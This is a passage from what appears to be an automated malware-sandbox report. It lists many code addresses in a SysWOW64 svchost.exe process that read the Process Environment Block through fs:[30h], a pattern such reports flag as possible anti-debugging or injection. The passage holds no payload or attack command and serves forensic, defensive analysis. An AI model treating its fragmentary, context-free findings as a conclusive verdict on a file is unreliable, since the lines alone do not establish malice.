          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB035C mov eax, dword ptr fs:[00000030h]2_2_03AB035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB035C mov eax, dword ptr fs:[00000030h]2_2_03AB035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB035C mov ecx, dword ptr fs:[00000030h]2_2_03AB035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB035C mov eax, dword ptr fs:[00000030h]2_2_03AB035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB035C mov eax, dword ptr fs:[00000030h]2_2_03AB035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFA352 mov eax, dword ptr fs:[00000030h]2_2_03AFA352
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD8350 mov ecx, dword ptr fs:[00000030h]2_2_03AD8350
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A402A0 mov eax, dword ptr fs:[00000030h]2_2_03A402A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A402A0 mov eax, dword ptr fs:[00000030h]2_2_03A402A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC62A0 mov eax, dword ptr fs:[00000030h]2_2_03AC62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC62A0 mov ecx, dword ptr fs:[00000030h]2_2_03AC62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC62A0 mov eax, dword ptr fs:[00000030h]2_2_03AC62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC62A0 mov eax, dword ptr fs:[00000030h]2_2_03AC62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC62A0 mov eax, dword ptr fs:[00000030h]2_2_03AC62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC62A0 mov eax, dword ptr fs:[00000030h]2_2_03AC62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6E284 mov eax, dword ptr fs:[00000030h]2_2_03A6E284
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6E284 mov eax, dword ptr fs:[00000030h]2_2_03A6E284
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB0283 mov eax, dword ptr fs:[00000030h]2_2_03AB0283
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB0283 mov eax, dword ptr fs:[00000030h]2_2_03AB0283
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB0283 mov eax, dword ptr fs:[00000030h]2_2_03AB0283
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A402E1 mov eax, dword ptr fs:[00000030h]2_2_03A402E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A402E1 mov eax, dword ptr fs:[00000030h]2_2_03A402E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A402E1 mov eax, dword ptr fs:[00000030h]2_2_03A402E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03A3A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03A3A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03A3A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03A3A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03A3A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2823B mov eax, dword ptr fs:[00000030h]2_2_03A2823B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A34260 mov eax, dword ptr fs:[00000030h]2_2_03A34260
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A34260 mov eax, dword ptr fs:[00000030h]2_2_03A34260
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A34260 mov eax, dword ptr fs:[00000030h]2_2_03A34260
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2826B mov eax, dword ptr fs:[00000030h]2_2_03A2826B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB8243 mov eax, dword ptr fs:[00000030h]2_2_03AB8243
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB8243 mov ecx, dword ptr fs:[00000030h]2_2_03AB8243
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2A250 mov eax, dword ptr fs:[00000030h]2_2_03A2A250
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A36259 mov eax, dword ptr fs:[00000030h]2_2_03A36259
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AEA250 mov eax, dword ptr fs:[00000030h]2_2_03AEA250
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AEA250 mov eax, dword ptr fs:[00000030h]2_2_03AEA250
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A70185 mov eax, dword ptr fs:[00000030h]2_2_03A70185
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AEC188 mov eax, dword ptr fs:[00000030h]2_2_03AEC188
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AEC188 mov eax, dword ptr fs:[00000030h]2_2_03AEC188
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD4180 mov eax, dword ptr fs:[00000030h]2_2_03AD4180
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD4180 mov eax, dword ptr fs:[00000030h]2_2_03AD4180
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB019F mov eax, dword ptr fs:[00000030h]2_2_03AB019F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB019F mov eax, dword ptr fs:[00000030h]2_2_03AB019F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB019F mov eax, dword ptr fs:[00000030h]2_2_03AB019F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB019F mov eax, dword ptr fs:[00000030h]2_2_03AB019F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2A197 mov eax, dword ptr fs:[00000030h]2_2_03A2A197
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2A197 mov eax, dword ptr fs:[00000030h]2_2_03A2A197
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2A197 mov eax, dword ptr fs:[00000030h]2_2_03A2A197
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B061E5 mov eax, dword ptr fs:[00000030h]2_2_03B061E5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A601F8 mov eax, dword ptr fs:[00000030h]2_2_03A601F8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF61C3 mov eax, dword ptr fs:[00000030h]2_2_03AF61C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF61C3 mov eax, dword ptr fs:[00000030h]2_2_03AF61C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03AAE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03AAE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAE1D0 mov ecx, dword ptr fs:[00000030h]2_2_03AAE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03AAE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03AAE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A60124 mov eax, dword ptr fs:[00000030h]2_2_03A60124
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADE10E mov eax, dword ptr fs:[00000030h]2_2_03ADE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADE10E mov ecx, dword ptr fs:[00000030h]2_2_03ADE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADE10E mov eax, dword ptr fs:[00000030h]2_2_03ADE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADE10E mov eax, dword ptr fs:[00000030h]2_2_03ADE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADE10E mov ecx, dword ptr fs:[00000030h]2_2_03ADE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADE10E mov eax, dword ptr fs:[00000030h]2_2_03ADE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADE10E mov eax, dword ptr fs:[00000030h]2_2_03ADE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADE10E mov ecx, dword ptr fs:[00000030h]2_2_03ADE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADE10E mov eax, dword ptr fs:[00000030h]2_2_03ADE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADE10E mov ecx, dword ptr fs:[00000030h]2_2_03ADE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADA118 mov ecx, dword ptr fs:[00000030h]2_2_03ADA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADA118 mov eax, dword ptr fs:[00000030h]2_2_03ADA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADA118 mov eax, dword ptr fs:[00000030h]2_2_03ADA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADA118 mov eax, dword ptr fs:[00000030h]2_2_03ADA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF0115 mov eax, dword ptr fs:[00000030h]2_2_03AF0115
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC4144 mov eax, dword ptr fs:[00000030h]2_2_03AC4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC4144 mov eax, dword ptr fs:[00000030h]2_2_03AC4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC4144 mov ecx, dword ptr fs:[00000030h]2_2_03AC4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC4144 mov eax, dword ptr fs:[00000030h]2_2_03AC4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC4144 mov eax, dword ptr fs:[00000030h]2_2_03AC4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2C156 mov eax, dword ptr fs:[00000030h]2_2_03A2C156
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC8158 mov eax, dword ptr fs:[00000030h]2_2_03AC8158
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A36154 mov eax, dword ptr fs:[00000030h]2_2_03A36154
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A36154 mov eax, dword ptr fs:[00000030h]2_2_03A36154
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC80A8 mov eax, dword ptr fs:[00000030h]2_2_03AC80A8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF60B8 mov eax, dword ptr fs:[00000030h]2_2_03AF60B8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF60B8 mov ecx, dword ptr fs:[00000030h]2_2_03AF60B8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3208A mov eax, dword ptr fs:[00000030h]2_2_03A3208A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2A0E3 mov ecx, dword ptr fs:[00000030h]2_2_03A2A0E3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A380E9 mov eax, dword ptr fs:[00000030h]2_2_03A380E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB60E0 mov eax, dword ptr fs:[00000030h]2_2_03AB60E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2C0F0 mov eax, dword ptr fs:[00000030h]2_2_03A2C0F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A720F0 mov ecx, dword ptr fs:[00000030h]2_2_03A720F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB20DE mov eax, dword ptr fs:[00000030h]2_2_03AB20DE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2A020 mov eax, dword ptr fs:[00000030h]2_2_03A2A020
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2C020 mov eax, dword ptr fs:[00000030h]2_2_03A2C020
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC6030 mov eax, dword ptr fs:[00000030h]2_2_03AC6030
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB4000 mov ecx, dword ptr fs:[00000030h]2_2_03AB4000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD2000 mov eax, dword ptr fs:[00000030h]2_2_03AD2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD2000 mov eax, dword ptr fs:[00000030h]2_2_03AD2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD2000 mov eax, dword ptr fs:[00000030h]2_2_03AD2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD2000 mov eax, dword ptr fs:[00000030h]2_2_03AD2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD2000 mov eax, dword ptr fs:[00000030h]2_2_03AD2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD2000 mov eax, dword ptr fs:[00000030h]2_2_03AD2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD2000 mov eax, dword ptr fs:[00000030h]2_2_03AD2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD2000 mov eax, dword ptr fs:[00000030h]2_2_03AD2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4E016 mov eax, dword ptr fs:[00000030h]2_2_03A4E016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4E016 mov eax, dword ptr fs:[00000030h]2_2_03A4E016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4E016 mov eax, dword ptr fs:[00000030h]2_2_03A4E016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4E016 mov eax, dword ptr fs:[00000030h]2_2_03A4E016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5C073 mov eax, dword ptr fs:[00000030h]2_2_03A5C073
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A32050 mov eax, dword ptr fs:[00000030h]2_2_03A32050
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB6050 mov eax, dword ptr fs:[00000030h]2_2_03AB6050
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A307AF mov eax, dword ptr fs:[00000030h]2_2_03A307AF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE47A0 mov eax, dword ptr fs:[00000030h]2_2_03AE47A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD678E mov eax, dword ptr fs:[00000030h]2_2_03AD678E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A527ED mov eax, dword ptr fs:[00000030h]2_2_03A527ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A527ED mov eax, dword ptr fs:[00000030h]2_2_03A527ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A527ED mov eax, dword ptr fs:[00000030h]2_2_03A527ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ABE7E1 mov eax, dword ptr fs:[00000030h]2_2_03ABE7E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A347FB mov eax, dword ptr fs:[00000030h]2_2_03A347FB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A347FB mov eax, dword ptr fs:[00000030h]2_2_03A347FB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3C7C0 mov eax, dword ptr fs:[00000030h]2_2_03A3C7C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB07C3 mov eax, dword ptr fs:[00000030h]2_2_03AB07C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6C720 mov eax, dword ptr fs:[00000030h]2_2_03A6C720
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6C720 mov eax, dword ptr fs:[00000030h]2_2_03A6C720
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6273C mov eax, dword ptr fs:[00000030h]2_2_03A6273C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6273C mov ecx, dword ptr fs:[00000030h]2_2_03A6273C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6273C mov eax, dword ptr fs:[00000030h]2_2_03A6273C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAC730 mov eax, dword ptr fs:[00000030h]2_2_03AAC730
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6C700 mov eax, dword ptr fs:[00000030h]2_2_03A6C700
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A30710 mov eax, dword ptr fs:[00000030h]2_2_03A30710
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A60710 mov eax, dword ptr fs:[00000030h]2_2_03A60710
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A38770 mov eax, dword ptr fs:[00000030h]2_2_03A38770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]2_2_03A40770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]2_2_03A40770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]2_2_03A40770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]2_2_03A40770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]2_2_03A40770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]2_2_03A40770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]2_2_03A40770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]2_2_03A40770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]2_2_03A40770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]2_2_03A40770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]2_2_03A40770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]2_2_03A40770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6674D mov esi, dword ptr fs:[00000030h]2_2_03A6674D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6674D mov eax, dword ptr fs:[00000030h]2_2_03A6674D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6674D mov eax, dword ptr fs:[00000030h]2_2_03A6674D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A30750 mov eax, dword ptr fs:[00000030h]2_2_03A30750
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ABE75D mov eax, dword ptr fs:[00000030h]2_2_03ABE75D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72750 mov eax, dword ptr fs:[00000030h]2_2_03A72750
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72750 mov eax, dword ptr fs:[00000030h]2_2_03A72750
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB4755 mov eax, dword ptr fs:[00000030h]2_2_03AB4755
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6C6A6 mov eax, dword ptr fs:[00000030h]2_2_03A6C6A6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A666B0 mov eax, dword ptr fs:[00000030h]2_2_03A666B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A34690 mov eax, dword ptr fs:[00000030h]2_2_03A34690
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A34690 mov eax, dword ptr fs:[00000030h]2_2_03A34690
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03AAE6F2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03AAE6F2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03AAE6F2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03AAE6F2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB06F1 mov eax, dword ptr fs:[00000030h]2_2_03AB06F1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB06F1 mov eax, dword ptr fs:[00000030h]2_2_03AB06F1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6A6C7 mov ebx, dword ptr fs:[00000030h]2_2_03A6A6C7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6A6C7 mov eax, dword ptr fs:[00000030h]2_2_03A6A6C7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4E627 mov eax, dword ptr fs:[00000030h]2_2_03A4E627
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A66620 mov eax, dword ptr fs:[00000030h]2_2_03A66620
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A68620 mov eax, dword ptr fs:[00000030h]2_2_03A68620
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3262C mov eax, dword ptr fs:[00000030h]2_2_03A3262C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAE609 mov eax, dword ptr fs:[00000030h]2_2_03AAE609
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4260B mov eax, dword ptr fs:[00000030h]2_2_03A4260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4260B mov eax, dword ptr fs:[00000030h]2_2_03A4260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4260B mov eax, dword ptr fs:[00000030h]2_2_03A4260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4260B mov eax, dword ptr fs:[00000030h]2_2_03A4260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4260B mov eax, dword ptr fs:[00000030h]2_2_03A4260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4260B mov eax, dword ptr fs:[00000030h]2_2_03A4260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4260B mov eax, dword ptr fs:[00000030h]2_2_03A4260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72619 mov eax, dword ptr fs:[00000030h]2_2_03A72619
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF866E mov eax, dword ptr fs:[00000030h]2_2_03AF866E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF866E mov eax, dword ptr fs:[00000030h]2_2_03AF866E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6A660 mov eax, dword ptr fs:[00000030h]2_2_03A6A660
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6A660 mov eax, dword ptr fs:[00000030h]2_2_03A6A660
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A62674 mov eax, dword ptr fs:[00000030h]2_2_03A62674
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4C640 mov eax, dword ptr fs:[00000030h]2_2_03A4C640
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB05A7 mov eax, dword ptr fs:[00000030h]2_2_03AB05A7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB05A7 mov eax, dword ptr fs:[00000030h]2_2_03AB05A7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB05A7 mov eax, dword ptr fs:[00000030h]2_2_03AB05A7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A545B1 mov eax, dword ptr fs:[00000030h]2_2_03A545B1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A545B1 mov eax, dword ptr fs:[00000030h]2_2_03A545B1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A32582 mov eax, dword ptr fs:[00000030h]2_2_03A32582
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A32582 mov ecx, dword ptr fs:[00000030h]2_2_03A32582
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A64588 mov eax, dword ptr fs:[00000030h]2_2_03A64588
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6E59C mov eax, dword ptr fs:[00000030h]2_2_03A6E59C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03A5E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03A5E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03A5E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03A5E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03A5E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03A5E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03A5E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03A5E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A325E0 mov eax, dword ptr fs:[00000030h]2_2_03A325E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6C5ED mov eax, dword ptr fs:[00000030h]2_2_03A6C5ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6C5ED mov eax, dword ptr fs:[00000030h]2_2_03A6C5ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6E5CF mov eax, dword ptr fs:[00000030h]2_2_03A6E5CF
